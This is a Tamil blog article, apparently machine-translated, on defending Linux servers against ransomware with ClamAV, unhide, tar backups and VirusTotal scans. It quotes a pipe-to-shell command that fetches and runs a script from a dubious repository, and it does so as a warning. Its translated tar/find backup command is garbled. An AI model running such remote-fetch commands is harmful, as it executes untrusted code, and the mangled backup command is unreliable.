நெட்வொர்க் பாதுகாப்பு உலகில் இன்று மிகவும் அச்சுறுத்தும் சிக்கல்களில் ஒன்று ரான்சம்வேர். யாராவது உங்கள் தரவை பணயக்கைதியாக வைத்திருக்க முடியும் என்று நினைப்பது பயமாக இருக்கிறது. சில ransomware நோய்த்தொற்றுகள் ஒரு குறிப்பிட்ட அளவிலான அனைத்து தரவையும் குறியாக்குகின்றன, மேலும் அதன் பின்னால் உள்ள நபர்கள் குறிப்பிட்ட தரவைத் திறக்க தேவையான விசையை வெளியிட ஒப்புக்கொள்வதற்கு முன்பு ஒரு குறிப்பிட்ட தொகையை கோருகிறார்கள். இது குறிப்பாக அவர்களின் தரவுகளில் அதிக பணம் முதலீடு செய்த நபர்களைப் பற்றியது. இருப்பினும், லினக்ஸ் பயனர்களுக்கு ஒரு சிறிய செய்தி உள்ளது.
பெரும்பாலான சூழ்நிலைகளில், ransomware குறியீட்டை ஒரு பயனரின் வீட்டு அடைவை விட வேறு எதையும் கட்டுப்படுத்துவது கடினம். இந்த நிரல்களுக்கு முழு நிறுவலையும் குப்பைக்கு அனுமதி இல்லை. இதனால்தான் ஆபரேட்டர்கள் எப்போதும் ரூட் அணுகலைக் கொண்ட சேவையகங்களில் லினக்ஸ் ransomware மிகவும் சிக்கலாக உள்ளது. Ransomware என்பது லினக்ஸ் பயனர்களுக்கு மிகவும் சிக்கலாக இருக்கக்கூடாது, மேலும் இது உங்களுக்கு நிகழாமல் தடுக்க பல படிகள் உள்ளன.
முறை 1: பாஷ்கிரிப்ட்-பாணி தாக்குதல்களுக்கு எதிராக பாதுகாத்தல்
இந்த வகை தீங்கிழைக்கும் குறியீட்டைக் கொண்டு சேவையக கட்டமைப்புகளை பாதிக்க முடியும் என்பதை நிரூபித்த ransomware இன் கருத்துத் துண்டுக்கான ஆதாரம் BasyCrypt. இது லினக்ஸ் ransomware தொகுப்புகள் எப்படி இருக்கும் என்பதற்கான அடிப்படையை வழங்குகிறது. அவை தற்போது அசாதாரணமானது என்றாலும், பிற தளங்களின் சேவையக நிர்வாகிகளுக்கான அதே வகையான பொது அறிவு தடுப்பு நடவடிக்கைகள் இங்கேயும் செயல்படுகின்றன. சிக்கல் என்னவென்றால், நிறுவன அளவிலான சூழல்களில் ஒரு புரவலன் அமைப்பைப் பயன்படுத்தி ஏராளமான மக்கள் இருக்கக்கூடும்.
நீங்கள் ஒரு அஞ்சல் சேவையகத்தை இயக்குகிறீர்கள் என்றால், முட்டாள்தனமான செயல்களைச் செய்வதிலிருந்து மக்களைத் தடுப்பது மிகவும் கடினம். அனைவருக்கும் அவர்கள் உறுதியாக தெரியாத இணைப்புகளைத் திறக்க வேண்டாம் என்பதை நினைவூட்டுவதற்கு உங்களால் முடிந்த அனைத்தையும் செய்யுங்கள், மேலும் தீம்பொருள் எப்போதும் கேள்விக்குரிய அனைத்தையும் ஸ்கேன் செய்கிறது. இந்த வகையான தாக்குதல்களைத் தடுக்க உண்மையில் உதவக்கூடிய மற்றொரு விஷயம், நீங்கள் விட்ஜெட்டுடன் பைனரிகளை எவ்வாறு நிறுவுகிறீர்கள் என்பதைப் பார்ப்பது. இயற்கையாகவே உங்கள் அஞ்சல் சேவையகத்தில் டெஸ்க்டாப் சூழல் முழுவதுமாக இல்லாதிருக்கலாம், மேலும் வரும் தொகுப்புகளை நிர்வகிக்க நீங்கள் wget, apt-get, yum அல்லது pacman ஐப் பயன்படுத்தலாம். இந்த நிறுவல்களில் என்ன களஞ்சியங்கள் பயன்படுத்தப்படுகின்றன என்பதைப் பார்ப்பது மிகவும் முக்கியம். சில நேரங்களில் நீங்கள் wget http: //www.thisisaprettybadcoderepo.webs/ -O- | போன்ற ஒன்றை இயக்க விரும்பும் கட்டளையைப் பார்ப்பீர்கள். sh, அல்லது அது ஷெல் ஸ்கிரிப்ட்டின் உள்ளே இருக்கலாம். எந்த வகையிலும், அந்த களஞ்சியம் என்னவென்று உங்களுக்குத் தெரியாவிட்டால் அதை இயக்க வேண்டாம்.
முறை 2: ஸ்கேனர் தொகுப்பை நிறுவுதல்
திறந்த மூல தீம்பொருள் ஸ்கேனிங் தொழில்நுட்பத்தின் பல துண்டுகள் உள்ளன. ClamAV இதுவரை மிகவும் பிரபலமானது, மேலும் இதைப் பயன்படுத்துவதன் மூலம் பல பொருத்தமான அடிப்படையிலான விநியோகங்களில் இதை நிறுவலாம்:
sudo apt-get install clamav
இது நிறுவப்பட்டதும், மேன் கிளாமவ் பயன்பாட்டை எளிய மொழியில் விளக்க வேண்டும். பாதிக்கப்பட்ட கோப்புகளை ஸ்கேன் செய்து அகற்றும்போது, அது உண்மையில் ஒரு கோப்பிலிருந்து தொற்று குறியீட்டை அகற்ற முடியாது என்பதை நினைவில் கொள்ளுங்கள். இது எல்லாம் அல்லது ஒன்றுமில்லாத நிலைமை.
உங்களுக்கு அறிமுகமில்லாத இரண்டாவது ஸ்கேனர் உள்ளது, ஆனால் மறைக்கப்பட்ட செயல்முறைகள் உங்களை பயமுறுத்துகின்றன என்றால் அது பயனுள்ளதாக இருக்கும். மீண்டும் நீங்கள் பொருத்தமான அடிப்படையிலான விநியோகத்தைப் பயன்படுத்துகிறீர்கள் என்றால், மறை ஸ்கேனரை நிறுவ இந்த கட்டளையை வழங்கவும்:
sudo apt-get install unhide
இது நிறுவப்பட்டதும், தட்டச்சு செய்க:
sudo unhide sys
மறைக்கப்பட்ட எந்த செயல்முறைகளுக்கும் இது உங்கள் கணினியின் முழு ஸ்கேன் செய்யும்.
முறை 4: சுத்தமான காப்புப்பிரதிகளை கையில் வைத்திருத்தல்
எல்லோரும் எப்போதும் காப்புப்பிரதிகளை உருவாக்க வேண்டும் என்பதால் இது ஒரு பிரச்சினையாக கூட இருக்கக்கூடாது, நல்ல காப்புப்பிரதிகளை வைத்திருப்பது உடனடியாக ransomware ஐ வெளியேற்றலாம். லினக்ஸ் இயங்குதளத்தில் மிகக் குறைவான ransomware என்னவென்றால், வலை அபிவிருத்தி தளங்களுக்கு குறிப்பிட்ட நீட்டிப்புகளுடன் கோப்புகளைத் தாக்கும். இதன் பொருள் உங்களிடம் ஒரு டன் .php, .xml அல்லது .js குறியீடு இருந்தால், நீங்கள் இதை காப்புப் பிரதி எடுக்க விரும்புவீர்கள். இந்த பின்வரும் குறியீட்டைக் கவனியுங்கள்:
tar -cf backups.tar $ (-name “* .ruby” -or -name “* .html” ஐக் கண்டறியவும்)
இது ஒரு கோப்பு கட்டமைப்பிற்குள் .ruby மற்றும் .html நீட்டிப்புகளுடன் ஒவ்வொரு கோப்பின் பெரிய டேப் காப்பக கோப்பை உருவாக்க வேண்டும். அதை உருவாக்குவது ஒழுங்காக செயல்படுவதை உறுதிசெய்ய பிரித்தெடுப்பதற்காக அதை வேறு தற்காலிக துணை அடைவுக்கு நகர்த்தலாம்.
இந்த டேப் காப்பகம் வெளிப்புற தொகுதிக்கு நகர்த்தப்படலாம். அவ்வாறு செய்வதற்கு முன் நீங்கள் நிச்சயமாக .bz2, .gz அல்லது .xv சுருக்கத்தைப் பயன்படுத்தலாம். இரண்டு வெவ்வேறு தொகுதிகளுக்கு நகலெடுப்பதன் மூலம் பிரதிபலித்த காப்புப்பிரதிகளை உருவாக்க நீங்கள் விரும்பலாம்.
முறை 5: வலை அடிப்படையிலான ஸ்கேனர்களைப் பயன்படுத்துதல்
பயனுள்ள மென்பொருளைக் கொண்டிருப்பதாக உறுதியளிக்கும் தளத்திலிருந்து ஒரு RPM அல்லது DEB தொகுப்பை நீங்கள் பதிவிறக்கியிருக்கலாம். மென்பொருள் 7z அல்லது சுருக்கப்பட்ட தார் கோப்புகள் வழியாகவும் விநியோகிக்கப்படுகிறது. மொபைல் பயனர்கள் APK வடிவத்தில் Android தொகுப்புகளையும் பெறலாம். உங்கள் உலாவியில் ஒரு கருவி மூலம் இவற்றை ஸ்கேன் செய்வது எளிது. இதை https://www.virustotal.com/ இல் சுட்டிக்காட்டவும், பக்கம் ஏற்றப்பட்டதும் “கோப்பைத் தேர்ந்தெடு” பொத்தானை அழுத்தவும். நீங்கள் பதிவேற்றுவதற்கு முன், இது ஒரு பொது சேவையகம் என்பதை நினைவில் கொள்ளுங்கள். இது பாதுகாப்பானது மற்றும் ஆல்பாபெட் இன்க் மூலம் இயக்கப்படும் போது, இது கோப்புகளை பொதுவில் மாற்றும், இது சில சூப்பர்-பாதுகாப்பான சூழல்களில் சிக்கலாக இருக்கலாம். இது 128 எம்பி கோப்புகளுக்கும் வரையறுக்கப்பட்டுள்ளது.
வரும் பெட்டியில் உங்கள் கோப்பைத் தேர்ந்தெடுத்து திற என்பதைத் தேர்ந்தெடுக்கவும். பெட்டி மறைந்த பிறகு பொத்தானின் அடுத்த வரியில் கோப்பு பெயர் தோன்றும்.
பெரிய நீல நிறத்தில் சொடுக்கவும் “ஸ்கேன் செய்யுங்கள்!” பொத்தானை. கணினி உங்கள் கோப்பை பதிவேற்றுகிறது என்பதைக் குறிக்கும் மற்றொரு பெட்டியைக் காண்பீர்கள்.
யாராவது ஏற்கனவே கோப்பை முன்பே சோதித்திருந்தால், அது முந்தைய அறிக்கையை உங்களுக்குத் தெரிவிக்கும். இது SHA256 தொகையை அடிப்படையாகக் கொண்டு அங்கீகரிக்கிறது, இது நீங்கள் பயன்படுத்திய அதே லினக்ஸ் கட்டளை வரி கருவிகளைப் போலவே செயல்படுகிறது. இல்லையென்றால், அது 53 வெவ்வேறு ஸ்கேனிங் நிரல்களுடன் முழு ஸ்கேன் இயக்கும். அவற்றில் சில கோப்பு இயங்கும்போது காலாவதியாகிவிடும், மேலும் இந்த முடிவுகள் பாதுகாப்பாக புறக்கணிக்கப்படலாம்.
சில நிரல்கள் மற்றவர்களை விட வேறுபட்ட முடிவுகளைத் தரக்கூடும், எனவே இந்த அமைப்புடன் தவறான நேர்மறைகளை களைவது எளிது. சிறந்த அம்சம் என்னவென்றால், இது வெவ்வேறு தளங்களுக்கு இடையில் செயல்படுகிறது, இது வெவ்வேறு சாதனங்களில் நீங்கள் எந்த விநியோகத்தைப் பெற்றிருந்தாலும் அதைப் போலவே கவர்ச்சிகரமானதாக ஆக்குகிறது. இது அண்ட்ராய்டு போன்ற மொபைல் விநியோகங்களிலிருந்தும் செயல்படுகிறது, அதனால்தான் APK தொகுப்புகளைப் பயன்படுத்துவதற்கு முன்பு அவற்றை ஆய்வு செய்வதற்கான சிறந்த வழியாகும்.
4 நிமிடங்கள் படித்தேன்
